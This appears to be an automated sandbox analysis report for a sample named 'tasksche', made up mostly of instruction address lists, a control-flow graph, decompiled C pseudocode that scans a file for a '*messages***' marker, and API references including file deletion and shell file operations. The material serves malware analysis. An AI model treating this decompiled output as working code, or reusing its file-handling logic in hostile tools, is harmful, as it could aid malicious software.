                                                                                              0x0040f2e7
                                                                                              0x0040f2e8
                                                                                              0x0040f2ee
                                                                                              0x0040f2f5
                                                                                              0x0040f2f7
                                                                                              0x0040f2f7
                                                                                              0x0040f30c
                                                                                              0x0040f311
                                                                                              0x0040f31d
                                                                                              0x0040f31f
                                                                                              0x0040f330
                                                                                              0x0040f33d
                                                                                              0x00000000
                                                                                              0x0040f321
                                                                                              0x0040f32c
                                                                                              0x0040f32e
                                                                                              0x0040f342
                                                                                              0x0040f34b
                                                                                              0x0040f357
                                                                                              0x0040f35e
                                                                                              0x0040f363
                                                                                              0x0040f364
                                                                                              0x0040f36c
                                                                                              0x0040f378
                                                                                              0x0040f37a
                                                                                              0x0040f37c
                                                                                              0x0040f382
                                                                                              0x0040f38b
                                                                                              0x0040f38d
                                                                                              0x0040f38f
                                                                                              0x0040f395
                                                                                              0x0040f39e
                                                                                              0x0040f3a0
                                                                                              0x0040f3a2
                                                                                              0x0040f3a8
                                                                                              0x0040f3b3
                                                                                              0x0040f3b6
                                                                                              0x0040f3b8
                                                                                              0x0040f3be
                                                                                              0x0040f3c8
                                                                                              0x0040f3d1
                                                                                              0x0040f3d6
                                                                                              0x0040f3de
                                                                                              0x0040f3e2
                                                                                              0x0040f3f0
                                                                                              0x0040f3f0
                                                                                              0x00000000
                                                                                              0x0040f3de
                                                                                              0x00000000
                                                                                              0x0040f32e
                                                                                              0x0040f31f
                                                                                              0x00000000
                                                                                              0x0040f3f8
                                                                                              0x0040f3fc
                                                                                              0x0040f3fe
                                                                                              0x0040f3fe
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ee4c
                                                                                              0x0040ee54
                                                                                              0x0040ee5a
                                                                                              0x0040ee5d
                                                                                              0x0040ee83
                                                                                              0x0040ee5f
                                                                                              0x0040ee5f
                                                                                              0x0040ee62
                                                                                              0x0040ee77
                                                                                              0x0040ee64
                                                                                              0x0040ee64
                                                                                              0x0040ee6b
                                                                                              0x0040ee6b
                                                                                              0x0040ee62
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040eec8
                                                                                              0x0040eec9
                                                                                              0x0040eece
                                                                                              0x0040eed0
                                                                                              0x0040eed0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e8ca
                                                                                              0x0040e8ce
                                                                                              0x0040e8d3
                                                                                              0x0040e8da
                                                                                              0x0040e8da
                                                                                              0x0040e8dd
                                                                                              0x00000000
                                                                                              0x0040e8df
                                                                                              0x0040e8df
                                                                                              0x00000000
                                                                                              0x0040e8df
                                                                                              0x0040f405
                                                                                              0x0040f41b
                                                                                              0x0040f421
                                                                                              0x0040f426
                                                                                              0x0040f429
                                                                                              0x0040f433

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0040E85C
                                                                                                • Part of subcall function 0040D781: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0040D82F
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,00000800,?,00000000,7490BB20,?,0040F541,?,00000003), ref: 0040E9A7
                                                                                              • _wcslen.LIBCMT ref: 0040E9E2
                                                                                              • _wcslen.LIBCMT ref: 0040E9F7
                                                                                              • _wcslen.LIBCMT ref: 0040EA1D
                                                                                              • _memset.LIBCMT ref: 0040EA33
                                                                                              • SHFileOperationW.SHELL32 ref: 0040EA56
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0040EA63
                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040EA71
                                                                                              • _wcscat.LIBCMT ref: 0040EB27
                                                                                              • _wcslen.LIBCMT ref: 0040EB5F
                                                                                              • _realloc.LIBCMT ref: 0040EB71
                                                                                              • _wcscat.LIBCMT ref: 0040EB8B
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040EBBC
                                                                                              • _wcslen.LIBCMT ref: 0040EC05
                                                                                              • _wcscpy.LIBCMT ref: 0040ED23
                                                                                              • _wcsrchr.LIBCMT ref: 0040ED33
                                                                                              • _wcscpy.LIBCMT ref: 0040ED52
                                                                                              • GetDlgItem.USER32 ref: 0040ED6B
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040ED7B
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040ED8A
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040EDB6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$File$AttributesMessageSendTextWindow_wcscat_wcscpy$DeleteEnvironmentExpandH_prologItemOperationStrings_memset_realloc_wcsrchr
                                                                                              • String ID: "$%s.%d.tmp$<br>$C:\Windows$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\
                                                                                              • API String ID: 3339014310-2533930246
                                                                                              • Opcode ID: 1bb81a03f226dba3655c32b312097dfc198427dd308b30be8a0741d2b148a8fe
                                                                                              • Instruction ID: 0f1639a2c7fd1c8d50817f8e0d6f0902ef34777a202bf9cba062cd401a3abf5d
                                                                                              • Opcode Fuzzy Hash: 1bb81a03f226dba3655c32b312097dfc198427dd308b30be8a0741d2b148a8fe
                                                                                              • Instruction Fuzzy Hash: F2F14EB1900219AADB20DBA1DC45BEE7378FF04314F4408BBFA15B21D1EB789A958F59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 465 40bc32-40bc5d call 41a4dc call 41aaf0 call 41ca29 472 40bc88-40bcba call 41a7f7 call 408786 call 4087c3 465->472 473 40bc5f-40bc7f GetModuleFileNameW call 41ca4f 465->473 484 40bcd0-40bcda 472->484 485 40bcbc-40bccb call 408c7d 472->485 478 40bc85 473->478 479 40bf0e-40bf1a 473->479 478->472 487 40bcdb-40bcdf 484->487 492 40bf0d 485->492 489 40bce5-40bd05 call 408bae call 408e7b 487->489 490 40bdfc-40be23 call 408fed call 41cf3e 487->490 499 40bd0a-40bd14 489->499 500 40bf03-40bf0c call 408c7d 490->500 501 40be29-40be3b call 408e7b 490->501 492->479 502 40bdc8-40bdec call 408fed 499->502 503 40bd1a-40bd24 499->503 500->492 517 40be44-40be53 call 41cf3e 501->517 518 40be3d-40be42 501->518 502->487 521 40bdf2-40bdf6 502->521 506 40bd26-40bd2e 503->506 507 40bd4b-40bd4f 503->507 506->507 511 40bd30-40bd49 call 41d008 506->511 512 40bd51-40bd5d 507->512 513 40bd7d-40bd80 507->513 511->507 531 40bdc0-40bdc5 511->531 512->513 520 40bd5f-40bd67 512->520 515 40bd82-40bd8a 513->515 516 40bdab-40bdb4 513->516 515->516 522 40bd8c-40bda5 call 41d008 515->522 516->503 523 40bdba 516->523 528 40befd 517->528 538 40be59-40be77 call 411b3c call 41a506 517->538 524 40be79-40be83 518->524 520->513 527 40bd69-40bd7b call 41c81c 520->527 521->490 521->528 522->516 522->528 523->502 533 40be85 524->533 534 40be87-40be94 524->534 527->513 542 40bdbc 527->542 528->500 531->502 533->534 535 40bef2-40befa 534->535 536 40be96-40bea0 534->536 535->528 536->535 540 40bea2-40bea6 536->540 538->524 543 40bea8-40beaf 540->543 544 40bed9-40bedd 540->544 542->531 546 40beb1-40beb4 543->546 547 40bed4 543->547 549 40bee5 544->549 550 40bedf-40bee3 544->550 552 40bed0-40bed2 546->552 553 40beb6-40beb9 546->553 554 40bed6-40bed7 547->554 551 40bee7 549->551 550->549 556 40bee8-40bef0 550->556 551->556 552->554 557 40bebb-40bebe 553->557 558 40becc-40bece 553->558 554->551 556->535 556->536 559 40bec0-40bec2 557->559 560 40bec8-40beca 557->560 558->554 559->556 561 40bec4-40bec6 559->561 560->554 561->554
                                                                                              C-Code - Quality: 83%
                                                                                              			E0040BC32(intOrPtr* __ecx, void* __edx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t82;
                                                                                              				WCHAR* _t83;
                                                                                              				intOrPtr _t90;
                                                                                              				void* _t91;
                                                                                              				unsigned int _t92;
                                                                                              				signed int _t100;
                                                                                              				intOrPtr _t102;
                                                                                              				intOrPtr _t104;
                                                                                              				intOrPtr _t106;
                                                                                              				signed int _t114;
                                                                                              				void* _t115;
                                                                                              				signed int _t116;
                                                                                              				signed int _t119;
                                                                                              				void* _t134;
                                                                                              				signed int _t139;
                                                                                              				signed int _t141;
                                                                                              				void* _t150;
                                                                                              				signed int _t153;
                                                                                              				signed int _t154;
                                                                                              				intOrPtr _t156;
                                                                                              				signed int _t158;
                                                                                              				signed int _t159;
                                                                                              				signed int _t160;
                                                                                              				signed int _t161;
                                                                                              				intOrPtr* _t165;
                                                                                              				void* _t167;
                                                                                              				void* _t169;
                                                                                              
                                                                                              				_t150 = __edx;
                                                                                              				E0041A4DC(E0042977F, _t167);
                                                                                              				E0041AAF0(0x4034);
                                                                                              				_t165 = __ecx;
                                                                                              				_t82 = E0041CA29( *((intOrPtr*)(_t167 + 8)), 0x5c);
                                                                                              				_t83 = _t167 - 0x2040;
                                                                                              				if(_t82 != 0) {
                                                                                              					L3:
                                                                                              					E0041A7F7(_t83,  *((intOrPtr*)(_t167 + 8)));
                                                                                              					E00408786(_t167 - 0x1040);
                                                                                              					_push(4);
                                                                                              					_t123 = 0;
                                                                                              					_push(_t167 - 0x2040);
                                                                                              					 *(_t167 - 4) = 0;
                                                                                              					if(E004087C3(_t167 - 0x1040) != 0) {
                                                                                              						_t12 = _t167 - 0x10;
                                                                                              						 *_t12 =  *(_t167 - 0x10) | 0xffffffff;
                                                                                              						__eflags =  *_t12;
                                                                                              						 *((char*)(_t167 + 0xb)) = 0;
                                                                                              						 *((intOrPtr*)(_t167 - 0x14)) = 0;
                                                                                              						_push(_t154);
                                                                                              						while(1) {
                                                                                              							__eflags =  *(_t167 - 0x10) - 0xffffffff;
                                                                                              							if( *(_t167 - 0x10) != 0xffffffff) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_t104 = E00408BAE(_t167 - 0x1040, _t150); // executed
                                                                                              							 *((intOrPtr*)(_t167 - 0x1c)) = _t104;
                                                                                              							_t143 = _t167 - 0x1040;
                                                                                              							_t106 = E00408E7B(_t167 - 0x1040, _t150, _t167 - 0x4040, 0x2000); // executed
                                                                                              							 *((intOrPtr*)(_t167 - 0x18)) = _t106;
                                                                                              							_t154 = 0;
                                                                                              							__eflags = _t106 + 0xfffffff0 - _t123;
                                                                                              							if(_t106 + 0xfffffff0 < _t123) {
                                                                                              								L22:
                                                                                              								_t123 = 0;
                                                                                              								E00408FED(_t167 - 0x1040,  *((intOrPtr*)(_t167 - 0x18)) +  *((intOrPtr*)(_t167 - 0x1c)) - 0x10, 0, 0);
                                                                                              								 *((intOrPtr*)(_t167 - 0x14)) =  *((intOrPtr*)(_t167 - 0x14)) + 1;
                                                                                              								__eflags =  *((intOrPtr*)(_t167 - 0x14)) - 0x80;
                                                                                              								if( *((intOrPtr*)(_t167 - 0x14)) < 0x80) {
                                                                                              									continue;
                                                                                              								} else {
                                                                                              									__eflags =  *(_t167 - 0x10) - 0xffffffff;
                                                                                              									if( *(_t167 - 0x10) == 0xffffffff) {
                                                                                              										goto L51;
                                                                                              									} else {
                                                                                              										break;
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								do {
                                                                                              									_t123 = _t167 + _t154 - 0x4040;
                                                                                              									__eflags =  *_t123 - 0x2a;
                                                                                              									if( *_t123 != 0x2a) {
                                                                                              										L11:
                                                                                              										__eflags =  *_t123 - 0x2a;
                                                                                              										if( *_t123 != 0x2a) {
                                                                                              											L15:
                                                                                              											__eflags =  *_t123 - 0x52;
                                                                                              											if( *_t123 != 0x52) {
                                                                                              												goto L18;
                                                                                              											} else {
                                                                                              												__eflags =  *((char*)(_t167 + _t154 - 0x403f)) - 0x61;
                                                                                              												if( *((char*)(_t167 + _t154 - 0x403f)) != 0x61) {
                                                                                              													goto L18;
                                                                                              												} else {
                                                                                              													_t114 = E0041D008(_t143, _t167 + _t154 - 0x403e, 0x42a6f0, 4);
                                                                                              													_t169 = _t169 + 0xc;
                                                                                              													__eflags = _t114;
                                                                                              													if(_t114 == 0) {
                                                                                              														L51:
                                                                                              														_t134 = _t167 - 0x1040;
                                                                                              													} else {
                                                                                              														goto L18;
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											_t115 = _t167 + _t154 - 0x403c;
                                                                                              											__eflags =  *((short*)(_t115 - 2)) - 0x2a;
                                                                                              											if( *((short*)(_t115 - 2)) != 0x2a) {
                                                                                              												goto L15;
                                                                                              											} else {
                                                                                              												_t143 =  *((intOrPtr*)(_t167 - 0x18)) + 0xffffffe0;
                                                                                              												__eflags = _t154 -  *((intOrPtr*)(_t167 - 0x18)) + 0xffffffe0;
                                                                                              												if(_t154 >  *((intOrPtr*)(_t167 - 0x18)) + 0xffffffe0) {
                                                                                              													goto L15;
                                                                                              												} else {
                                                                                              													_t116 = E0041C81C(_t115, L"*messages***", 0xb);
                                                                                              													_t169 = _t169 + 0xc;
                                                                                              													__eflags = _t116;
                                                                                              													if(_t116 == 0) {
                                                                                              														 *((char*)(_t167 + 0xb)) = 1;
                                                                                              														goto L21;
                                                                                              													} else {
                                                                                              														goto L15;
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              									} else {
                                                                                              										__eflags =  *((char*)(_t167 + _t154 - 0x403f)) - 0x2a;
                                                                                              										if( *((char*)(_t167 + _t154 - 0x403f)) != 0x2a) {
                                                                                              											goto L11;
                                                                                              										} else {
                                                                                              											_t119 = E0041D008(_t143, _t167 + _t154 - 0x403e, "*messages***", 0xb);
                                                                                              											_t169 = _t169 + 0xc;
                                                                                              											__eflags = _t119;
                                                                                              											if(_t119 == 0) {
                                                                                              												L21:
                                                                                              												_t154 = _t154 +  *((intOrPtr*)(_t167 - 0x1c));
                                                                                              												__eflags = _t154;
                                                                                              												 *(_t167 - 0x10) = _t154;
                                                                                              												goto L22;
                                                                                              											} else {
                                                                                              												goto L11;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              									goto L52;
                                                                                              									L18:
                                                                                              									_t154 = _t154 + 1;
                                                                                              									__eflags = _t154 -  *((intOrPtr*)(_t167 - 0x18)) + 0xfffffff0;
                                                                                              								} while (_t154 <=  *((intOrPtr*)(_t167 - 0x18)) + 0xfffffff0);
                                                                                              								goto L22;
                                                                                              							}
                                                                                              							L52:
                                                                                              							_t75 = _t167 - 4;
                                                                                              							 *_t75 =  *(_t167 - 4) | 0xffffffff;
                                                                                              							__eflags =  *_t75;
                                                                                              							_t91 = E00408C7D(_t123, _t134);
                                                                                              							goto L53;
                                                                                              						}
                                                                                              						asm("cdq");
                                                                                              						E00408FED(_t167 - 0x1040,  *(_t167 - 0x10), _t150, _t123);
                                                                                              						_t90 = E0041CF3E(_t123, _t150, _t154, 0x80002);
                                                                                              						 *_t165 = _t90;
                                                                                              						_t134 = _t167 - 0x1040;
                                                                                              						__eflags = _t90 - _t123;
                                                                                              						if(_t90 != _t123) {
                                                                                              							_t92 = E00408E7B(_t134, _t150, _t90, 0x80000);
                                                                                              							__eflags =  *((char*)(_t167 + 0xb));
                                                                                              							 *(_t165 + 4) = _t92;
                                                                                              							if( *((char*)(_t167 + 0xb)) == 0) {
                                                                                              								_t156 = E0041CF3E(_t123, _t150, _t154, _t92 + _t92 + 2);
                                                                                              								__eflags = _t156 - _t123;
                                                                                              								if(_t156 != _t123) {
                                                                                              									 *((char*)( *(_t165 + 4) +  *_t165)) = 0;
                                                                                              									__eflags =  *(_t165 + 4) + 1;
                                                                                              									E00411B3C( *_t165, _t156,  *(_t165 + 4) + 1);
                                                                                              									_push( *_t165);
                                                                                              									E0041A506(_t123, _t156, _t165, __eflags);
                                                                                              									 *_t165 = _t156;
                                                                                              									goto L29;
                                                                                              								}
                                                                                              							} else {
                                                                                              								 *(_t165 + 4) = _t92 >> 1;
                                                                                              								L29:
                                                                                              								_t139 =  *(_t165 + 4);
                                                                                              								_t100 = 0x40000;
                                                                                              								__eflags = _t139 - 0x40000;
                                                                                              								if(_t139 <= 0x40000) {
                                                                                              									_t100 = _t139;
                                                                                              								}
                                                                                              								 *((short*)( *_t165 + _t100 * 2)) = 0;
                                                                                              								_t141 = 0;
                                                                                              								__eflags =  *(_t165 + 4);
                                                                                              								if( *(_t165 + 4) > 0) {
                                                                                              									while(1) {
                                                                                              										_t102 =  *_t165;
                                                                                              										_t153 =  *(_t102 + _t123 * 2) & 0x0000ffff;
                                                                                              										_t123 = _t123 + 1;
                                                                                              										__eflags = _t153;
                                                                                              										if(_t153 == 0) {
                                                                                              											goto L50;
                                                                                              										}
                                                                                              										__eflags = _t153 - 0x5c;
                                                                                              										if(_t153 != 0x5c) {
                                                                                              											__eflags = _t153 - 0xd;
                                                                                              											if(_t153 == 0xd) {
                                                                                              												L47:
                                                                                              												_push(0xc);
                                                                                              												goto L48;
                                                                                              											} else {
                                                                                              												__eflags = _t153 - 0xa;
                                                                                              												if(_t153 == 0xa) {
                                                                                              													goto L47;
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											_t158 = ( *(_t102 + _t123 * 2) & 0x0000ffff) - 0x22;
                                                                                              											__eflags = _t158;
                                                                                              											if(_t158 == 0) {
                                                                                              												_push(0x22);
                                                                                              												goto L44;
                                                                                              											} else {
                                                                                              												_t159 = _t158 - 0x3a;
                                                                                              												__eflags = _t159;
                                                                                              												if(_t159 == 0) {
                                                                                              													_push(0x5c);
                                                                                              													goto L44;
                                                                                              												} else {
                                                                                              													_t160 = _t159 - 0x12;
                                                                                              													__eflags = _t160;
                                                                                              													if(_t160 == 0) {
                                                                                              														_push(0xa);
                                                                                              														goto L44;
                                                                                              													} else {
                                                                                              														_t161 = _t160 - 4;
                                                                                              														__eflags = _t161;
                                                                                              														if(_t161 == 0) {
                                                                                              															_push(0xd);
                                                                                              															goto L44;
                                                                                              														} else {
                                                                                              															__eflags = _t161 == 0;
                                                                                              															if(_t161 == 0) {
                                                                                              																_push(9);
                                                                                              																L44:
                                                                                              																_t123 = _t123 + 1;
                                                                                              																L48:
                                                                                              																_pop(_t153);
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              										 *(_t102 + _t141 * 2) = _t153;
                                                                                              										_t141 = _t141 + 1;
                                                                                              										__eflags = _t123 -  *(_t165 + 4);
                                                                                              										if(_t123 <  *(_t165 + 4)) {
                                                                                              											continue;
                                                                                              										}
                                                                                              										goto L50;
                                                                                              									}
                                                                                              								}
                                                                                              								L50:
                                                                                              								__eflags = 0;
                                                                                              								 *((short*)( *_t165 + _t141 * 2)) = 0;
                                                                                              								 *(_t165 + 4) = _t141;
                                                                                              							}
                                                                                              							goto L51;
                                                                                              						}
                                                                                              						goto L52;
                                                                                              					} else {
                                                                                              						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                                              						_t91 = E00408C7D(0, _t167 - 0x1040);
                                                                                              					}
                                                                                              					L53:
                                                                                              				} else {
                                                                                              					GetModuleFileNameW(0, _t83, 0x800);
                                                                                              					_t91 = E0041CA4F(_t167 - 0x2040, 0x5c);
                                                                                              					if(_t91 != 0) {
                                                                                              						_t83 = _t91 + 2;
                                                                                              						goto L3;
                                                                                              					}
                                                                                              				}
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t167 - 0xc));
                                                                                              				return _t91;
                                                                                              			}

































                                                                                              0x0040bc32
                                                                                              0x0040bc37
                                                                                              0x0040bc41
                                                                                              0x0040bc4c
                                                                                              0x0040bc4e
                                                                                              0x0040bc57
                                                                                              0x0040bc5d
                                                                                              0x0040bc88
                                                                                              0x0040bc8c
                                                                                              0x0040bc9a
                                                                                              0x0040bc9f
                                                                                              0x0040bca7
                                                                                              0x0040bca9
                                                                                              0x0040bcb0
                                                                                              0x0040bcba
                                                                                              0x0040bcd0
                                                                                              0x0040bcd0
                                                                                              0x0040bcd0
                                                                                              0x0040bcd4
                                                                                              0x0040bcd7
                                                                                              0x0040bcda
                                                                                              0x0040bcdb
                                                                                              0x0040bcdb
                                                                                              0x0040bcdf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bceb
                                                                                              0x0040bcf0
                                                                                              0x0040bcff
                                                                                              0x0040bd05
                                                                                              0x0040bd0a
                                                                                              0x0040bd10
                                                                                              0x0040bd12
                                                                                              0x0040bd14
                                                                                              0x0040bdc8
                                                                                              0x0040bdce
                                                                                              0x0040bddd
                                                                                              0x0040bde2
                                                                                              0x0040bde5
                                                                                              0x0040bdec
                                                                                              0x00000000
                                                                                              0x0040bdf2
                                                                                              0x0040bdf2
                                                                                              0x0040bdf6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bdf6
                                                                                              0x0040bd1a
                                                                                              0x0040bd1a
                                                                                              0x0040bd1a
                                                                                              0x0040bd21
                                                                                              0x0040bd24
                                                                                              0x0040bd4b
                                                                                              0x0040bd4b
                                                                                              0x0040bd4f
                                                                                              0x0040bd7d
                                                                                              0x0040bd7d
                                                                                              0x0040bd80
                                                                                              0x00000000
                                                                                              0x0040bd82
                                                                                              0x0040bd82
                                                                                              0x0040bd8a
                                                                                              0x00000000
                                                                                              0x0040bd8c
                                                                                              0x0040bd9b
                                                                                              0x0040bda0
                                                                                              0x0040bda3
                                                                                              0x0040bda5
                                                                                              0x0040befd
                                                                                              0x0040befd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bda5
                                                                                              0x0040bd8a
                                                                                              0x0040bd51
                                                                                              0x0040bd51
                                                                                              0x0040bd58
                                                                                              0x0040bd5d
                                                                                              0x00000000
                                                                                              0x0040bd5f
                                                                                              0x0040bd62
                                                                                              0x0040bd65
                                                                                              0x0040bd67
                                                                                              0x00000000
                                                                                              0x0040bd69
                                                                                              0x0040bd71
                                                                                              0x0040bd76
                                                                                              0x0040bd79
                                                                                              0x0040bd7b
                                                                                              0x0040bdbc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bd7b
                                                                                              0x0040bd67
                                                                                              0x0040bd5d
                                                                                              0x0040bd26
                                                                                              0x0040bd26
                                                                                              0x0040bd2e
                                                                                              0x00000000
                                                                                              0x0040bd30
                                                                                              0x0040bd3f
                                                                                              0x0040bd44
                                                                                              0x0040bd47
                                                                                              0x0040bd49
                                                                                              0x0040bdc0
                                                                                              0x0040bdc3
                                                                                              0x0040bdc3
                                                                                              0x0040bdc5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bd49
                                                                                              0x0040bd2e
                                                                                              0x00000000
                                                                                              0x0040bdab
                                                                                              0x0040bdae
                                                                                              0x0040bdb2
                                                                                              0x0040bdb2
                                                                                              0x00000000
                                                                                              0x0040bdba
                                                                                              0x0040bf03
                                                                                              0x0040bf03
                                                                                              0x0040bf03
                                                                                              0x0040bf03
                                                                                              0x0040bf07
                                                                                              0x00000000
                                                                                              0x0040bf0c
                                                                                              0x0040bdff
                                                                                              0x0040be09
                                                                                              0x0040be13
                                                                                              0x0040be19
                                                                                              0x0040be1b
                                                                                              0x0040be21
                                                                                              0x0040be23
                                                                                              0x0040be2f
                                                                                              0x0040be34
                                                                                              0x0040be38
                                                                                              0x0040be3b
                                                                                              0x0040be4e
                                                                                              0x0040be51
                                                                                              0x0040be53
                                                                                              0x0040be5e
                                                                                              0x0040be65
                                                                                              0x0040be6a
                                                                                              0x0040be6f
                                                                                              0x0040be71
                                                                                              0x0040be77
                                                                                              0x00000000
                                                                                              0x0040be77
                                                                                              0x0040be3d
                                                                                              0x0040be3f
                                                                                              0x0040be79
                                                                                              0x0040be79
                                                                                              0x0040be7c
                                                                                              0x0040be81
                                                                                              0x0040be83
                                                                                              0x0040be85
                                                                                              0x0040be85
                                                                                              0x0040be8b
                                                                                              0x0040be8f
                                                                                              0x0040be91
                                                                                              0x0040be94
                                                                                              0x0040be96
                                                                                              0x0040be96
                                                                                              0x0040be98
                                                                                              0x0040be9c
                                                                                              0x0040be9d
                                                                                              0x0040bea0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bea2
                                                                                              0x0040bea6
                                                                                              0x0040bed9
                                                                                              0x0040bedd
                                                                                              0x0040bee5
                                                                                              0x0040bee5
                                                                                              0x00000000
                                                                                              0x0040bedf
                                                                                              0x0040bedf
                                                                                              0x0040bee3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bee3
                                                                                              0x0040bea8
                                                                                              0x0040beac
                                                                                              0x0040beac
                                                                                              0x0040beaf
                                                                                              0x0040bed4
                                                                                              0x00000000
                                                                                              0x0040beb1
                                                                                              0x0040beb1
                                                                                              0x0040beb1
                                                                                              0x0040beb4
                                                                                              0x0040bed0
                                                                                              0x00000000
                                                                                              0x0040beb6
                                                                                              0x0040beb6
                                                                                              0x0040beb6
                                                                                              0x0040beb9
                                                                                              0x0040becc
                                                                                              0x00000000
                                                                                              0x0040bebb
                                                                                              0x0040bebb
                                                                                              0x0040bebb
                                                                                              0x0040bebe
                                                                                              0x0040bec8
                                                                                              0x00000000
                                                                                              0x0040bec0
                                                                                              0x0040bec1
                                                                                              0x0040bec2
                                                                                              0x0040bec4
                                                                                              0x0040bed6
                                                                                              0x0040bed6
                                                                                              0x0040bee7
                                                                                              0x0040bee7
                                                                                              0x0040bee7
                                                                                              0x0040bec2
                                                                                              0x0040bebe
                                                                                              0x0040beb9
                                                                                              0x0040beb4
                                                                                              0x0040beaf
                                                                                              0x0040bee8
                                                                                              0x0040beec
                                                                                              0x0040beed
                                                                                              0x0040bef0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bef0
                                                                                              0x0040be96
                                                                                              0x0040bef2
                                                                                              0x0040bef4
                                                                                              0x0040bef6
                                                                                              0x0040befa
                                                                                              0x0040befa
                                                                                              0x00000000
                                                                                              0x0040be3b
                                                                                              0x00000000
                                                                                              0x0040bcbc
                                                                                              0x0040bcbc
                                                                                              0x0040bcc6
                                                                                              0x0040bcc6
                                                                                              0x0040bf0d
                                                                                              0x0040bc5f
                                                                                              0x0040bc67
                                                                                              0x0040bc76
                                                                                              0x0040bc7f
                                                                                              0x0040bc85
                                                                                              0x00000000
                                                                                              0x0040bc85
                                                                                              0x0040bc7f
                                                                                              0x0040bf12
                                                                                              0x0040bf1a

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0040BC37
                                                                                              • _wcschr.LIBCMT ref: 0040BC4E
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,004335BC,0040C3B4,0041005C,00439820,0041005C,00439820), ref: 0040BC67
                                                                                              • _wcsrchr.LIBCMT ref: 0040BC76
                                                                                              • _wcscpy.LIBCMT ref: 0040BC8C
                                                                                              • _malloc.LIBCMT ref: 0040BE13
                                                                                                • Part of subcall function 00408BAE: SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408BE1
                                                                                                • Part of subcall function 00408BAE: GetLastError.KERNEL32(?,?), ref: 00408BEE
                                                                                              • _strncmp.LIBCMT ref: 0040BD3F
                                                                                              • _strncmp.LIBCMT ref: 0040BD9B
                                                                                              • _malloc.LIBCMT ref: 0040BE49
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: File_malloc_strncmp$ErrorH_prologLastModuleNamePointer_wcschr_wcscpy_wcsrchr
                                                                                              • String ID: *messages***$*messages***$a
                                                                                              • API String ID: 644328012-1639468518
                                                                                              • Opcode ID: ce92c9ddd730c79d2188c1e242c279a763945db822d6a664a738baf9c01ceca9
